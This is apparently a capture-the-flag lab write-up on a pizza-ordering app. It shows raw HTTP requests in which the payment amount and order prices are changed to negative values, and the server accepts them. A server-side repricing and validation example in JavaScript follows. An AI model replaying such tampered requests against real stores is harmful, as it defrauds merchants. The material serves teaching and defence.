Can you order things for less than the intended price?
Once you get the lab up and running, go ahead and register an account. After logging in you'll land on the home page. Since we kind of know that this has something to do with the price of the item we are ordering, we can go through the steps to create and fully purchase an order. In either Caido or Burp Suite, make sure that you are capturing the requests; one of the first requests that I looked at was:
POST /api/payment/process HTTP/1.1
Host: lab-1771876487783-vpjyzg.labs-app.bugforge.io
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:147.0) Gecko/20100101 Firefox/147.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate, br, zstd
Content-Type: application/json
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6NCwidXNlcm5hbWUiOiJ0ZXN0IiwiaWF0IjoxNzcxODc2NTY0fQ.ST2EYFjPyhPzooKosYOh6HpAMOiYXou9DlSQ29r-Ezg
Content-Length: 52
Origin: https://lab-1771876487783-vpjyzg.labs-app.bugforge.io
Connection: keep-alive
Referer: https://lab-1771876487783-vpjyzg.labs-app.bugforge.io/checkout
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
{"card_number":"4444 4444 4444 4444","amount":10.99}
The response to the above request was:
HTTP/1.1 200 OK
Access-Control-Allow-Origin: *
Content-Length: 96
Content-Type: application/json; charset=utf-8
Date: Mon, 23 Feb 2026 19:56:27 GMT
Etag: W/"60-/nooK0IT6pC4APjJdQLtSba2j/Q"
X-Powered-By: Express
{
"success": true,
"transaction_id": "TXN-1771876587069",
"message": "Payment processed successfully"
}
I fed that request into Caido's replay feature and changed the "amount" from 10.99 to -10.99, just to see if I would end up getting a new transaction_id, and funny enough we do:
HTTP/1.1 200 OK
Access-Control-Allow-Origin: *
Content-Length: 96
Content-Type: application/json; charset=utf-8
Date: Mon, 23 Feb 2026 19:56:41 GMT
Etag: W/"60-bzN46vEeVOe7UvCzDNFi8vZue/A"
X-Powered-By: Express
Connection: close
{
"success": true,
"transaction_id": "TXN-1771876601959",
"message": "Payment processed successfully"
}
What I didn't get, however, was a different order number, and when I navigated to /orders the first order I created was still purchased for 10.99. The next request, however, was a POST to /api/orders. I repeated the same steps as above and changed both the unit_price and the total_price from a positive number to a negative number:
POST /api/orders HTTP/1.1
Host: lab-1771876487783-vpjyzg.labs-app.bugforge.io
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:147.0) Gecko/20100101 Firefox/147.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate, br, zstd
Content-Type: application/json
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6NCwidXNlcm5hbWUiOiJ0ZXN0IiwiaWF0IjoxNzcxODc2NTY0fQ.ST2EYFjPyhPzooKosYOh6HpAMOiYXou9DlSQ29r-Ezg
Content-Length: 327
Origin: https://lab-1771876487783-vpjyzg.labs-app.bugforge.io
Connection: keep-alive
Referer: https://lab-1771876487783-vpjyzg.labs-app.bugforge.io/checkout
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
{"items":[{"pizza_name":"Classic Margherita","base_name":"Thin Crust","sauce_name":"Classic Tomato","size":"Medium","toppings":["Tomatoes","Extra Mozzarella"],"quantity":1,"unit_price":-10.99,"total_price":-10.99,"id":1771876573487}],"delivery_address":"1234 test ave","phone":"(111) 111-1111","payment_method":"card","notes":""}
I ended up getting a good response and an entirely different order number from my first order:
HTTP/1.1 200 OK
Access-Control-Allow-Origin: *
Content-Length: 112
Content-Type: application/json; charset=utf-8
Date: Mon, 23 Feb 2026 19:57:30 GMT
Etag: W/"70-dDZWuoqlDA9j58APv8E2mocW8Bs"
X-Powered-By: Express
Connection: close
{
"id": 2,
"order_number": "CDI-1771876650504-1L5UZG7QB",
"message": "Order created successfully",
"status": "received"
}
Navigating to /orders, we can see we now have 2 orders... nice!
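Both requests go through because the Express backend takes unit_price, total_price and amount straight from the client. The fix is to reprice everything on the server and reject anything that is not a positive, catalogue-derived total. Below is an added example of that check in plain JavaScript (not the lab's code); the catalogue values are constructed so that a Medium Margherita with two toppings reproduces the 10.99 seen in the capture.

```javascript
// Added example, not the lab's code: server-side repricing for the two
// endpoints in the write-up. Catalogue values are constructed (Medium
// Margherita 8.99 + 1.00 per topping reproduces the lab's 10.99).
const CATALOGUE_CENTS = { "Classic Margherita": { Small: 799, Medium: 899, Large: 1099 } };
const TOPPING_CENTS = 100;
const MAX_QTY = 50;

// Reprice one line item from the catalogue; the client-sent unit_price is
// never used for pricing, only compared so a mismatch can be logged.
function priceItem(item) {
  const sizes = CATALOGUE_CENTS[item.pizza_name];
  if (!sizes || !Object.hasOwn(sizes, item.size)) {
    throw new Error(`unknown pizza or size: ${item.pizza_name}/${item.size}`);
  }
  const qty = item.quantity;
  if (!Number.isInteger(qty) || qty < 1 || qty > MAX_QTY) {
    throw new Error(`invalid quantity: ${qty}`);
  }
  const unitCents = sizes[item.size] + (item.toppings ?? []).length * TOPPING_CENTS;
  const claimed = Math.round(Number(item.unit_price) * 100);
  const tampered = Number.isInteger(claimed) && claimed !== unitCents;
  return { unitCents, totalCents: unitCents * qty, tampered };
}

// POST /api/orders: price the whole order on the server or reject it.
function priceOrder(body) {
  try {
    if (!Array.isArray(body.items) || body.items.length === 0) throw new Error("no items");
    const items = body.items.map(priceItem);
    const totalCents = items.reduce((sum, it) => sum + it.totalCents, 0);
    return { ok: true, totalCents, tampered: items.some((it) => it.tampered) };
  } catch (err) {
    return { ok: false, reason: err.message };
  }
}

// POST /api/payment/process: amount must be positive and must equal the
// server-computed total of the order being paid, not the client's figure.
function validatePayment(order, payment) {
  const priced = priceOrder(order);
  if (!priced.ok) return priced;
  const amountCents = Math.round(Number(payment.amount) * 100);
  if (!Number.isInteger(amountCents) || amountCents <= 0) {
    return { ok: false, reason: "amount must be positive" };
  }
  if (amountCents !== priced.totalCents) {
    return { ok: false, reason: `amount ${amountCents} != server total ${priced.totalCents}` };
  }
  return { ok: true, amountCents };
}
```

The tampered flag is the detection hook: a client whose submitted price disagrees with the server's own calculation is worth alerting on even though the order is still charged correctly.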
No AI used in the making of this post, that I know of at least 😀